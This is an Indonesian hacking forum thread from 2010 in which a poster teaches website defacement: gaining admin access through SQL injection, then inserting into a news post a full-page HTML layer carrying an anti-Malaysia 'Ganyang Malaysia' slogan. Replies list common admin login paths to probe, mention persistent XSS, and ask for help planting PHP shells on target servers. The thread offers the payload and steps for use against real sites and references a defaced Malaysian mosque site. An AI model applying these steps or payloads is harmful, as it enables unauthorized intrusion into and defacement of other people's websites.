Page 1 of 2
DEFACE with LAYER
Posted: Mon Aug 23, 2010 2:41 am
by Xshadow
deface kan biasanya mengganti script index...
[itu jika kita bisa tanam phpshell di server target]
seperti ini
http://i37.tinypic.com/292lohg.jpg
jika gak bisa, biasanya defacer hanya dilakukan seperti ini
http://security.org.my/uploads/masjidannur.com.my.jpeg
tapi ada trik lain jika gak bisa tanem shell tapi hasil deface full...
BISA!!!
POC:
sql inject dolo kemudian masuk admin... cari halaman untuk menulis news atau apalah di halaman admin... kemudian masukkan code contoh berikut...
Code: Select all
<div style="border: 1px none rgb(0, 0, 0); left: 1px; width: 1280px; position: absolute; top: 0px; height: 5000px; background-color: rgb(0, 0, 0);" id="Layer1">
<center>
<bdo dir="ltr">
<font color="#00ff00" size="5">INGATLAH KATA2 INI PEMUDA INDONESIA!<br><br>
Yoo...ayoo... kita... Ganjang...<br>
...Ganjang... Malaysia<br>
Ganjang... Malaysia<br>
Bulatkan tekad<br>
Semangat kita badja<br>
Peluru kita banjak<br>
Njawa kita banjak<br>
Bila perlu satoe-satoe!<br>
<br>
Soekarno.
</font>
</bdo>
</center>
</div>
hasilnya...
http://i38.tinypic.com/14c5rts.png
sorry gak saya tampilkan... soalnya screenshot terlalu lebar pakai laptop dual monitor soalnya hehehe...
Re: DEFACE with LAYER
Posted: Mon Aug 23, 2010 11:21 am
by APeLL
mw tanya donk om, ntu cara masuk k'adminnya gimana dah klu misalnya kita dah slese injek2 n dapet id admin n pass nya, maklum masih nyubi teh abdi
Re: DEFACE with LAYER
Posted: Mon Aug 23, 2010 11:52 am
by .::Z10R::.
Xshadow masih eksis
:kaca: :kaca: :kaca: :kaca:
Re: DEFACE with LAYER
Posted: Mon Aug 23, 2010 4:36 pm
by abit doang
.::Z10R::. wrote:Xshadow masih eksis
:kaca: :kaca: :kaca: :kaca:
xshadow gak da matinya..
mantep tutornya om X,..
tapi sekarang agak2 atut buat dipes indek,..
:tapa: :malumalu: :pusing:
APeLL wrote:mw tanya donk om, ntu cara masuk k'adminnya gimana dah klu misalnya kita dah slese injek2 n dapet id admin n pass nya, maklum masih nyubi teh abdi
cari hlaman admin terus masuk pake user dan password yg udah ada,..
halaman admin tuh biasanya
Code: Select all
http://alamattarget.com/login.php
http://alamattarget.com/login.htm
http://alamattarget.com/admin.php
http://alamattarget.com/admin
http://alamattarget.com/administrator
dll
search di forum ini, udah sering dibahas cara nyari page admin/login..
Re: DEFACE with LAYER
Posted: Tue Aug 24, 2010 11:51 pm
by demonbrando
mantap nih scriptnya om xshadow
Re: DEFACE with LAYER
Posted: Wed Aug 25, 2010 1:06 pm
by Darkzzzz
Sebenernya cara ini sudah pernah saya paparkan lho berikut juga POC alias tata cara pemakaiannya, mungkin ada yang belum pernah membacanya
Silahkan baca di sini : http://www.xcode.or.id/forum/viewtopic.php?f=99&t=37285
Re: DEFACE with LAYER
Posted: Sun Aug 29, 2010 12:17 am
by Xshadow
wah repost... :mati:
Re: DEFACE with LAYER
Posted: Sun Aug 29, 2010 9:51 am
by Darkzzzz
@Xshadow
Hahahha... Makanya Om OL terus donk biar tau perkembangan XCode :p Hehehhe... Maksud ane, biar bisa mantau
Deface With Layer ini rentan ya om sama XSS Persistent... Walopun di purifier kan, bisa tetep kena ya Om?
Tapi menurut ane om, akan lebih baik jika om mengajarkan yang ini => [itu jika kita bisa tanam phpshell di server target] <= 3:) Hehehhe...
Re: DEFACE with LAYER
Posted: Sun Aug 29, 2010 11:53 am
by abit doang
Darkzzzz wrote:@Xshadow
Tapi menurut ane om, akan lebih baik jika om mengajarkan yang ini => [itu jika kita bisa tanam phpshell di server target] <= 3:) Hehehhe...
betul, betul,.. share donk om.. :tapa:
apa yang harus dilakukan setelah sudah pasang shell, selain deface index tentunya,..
:pusing:
Re: DEFACE with LAYER
Posted: Thu Oct 28, 2010 7:01 pm
by inyo^
.::Z10R::. wrote:Xshadow masih eksis
:kaca: :kaca: :kaca: :kaca:
wihhhh :kaca :kaca
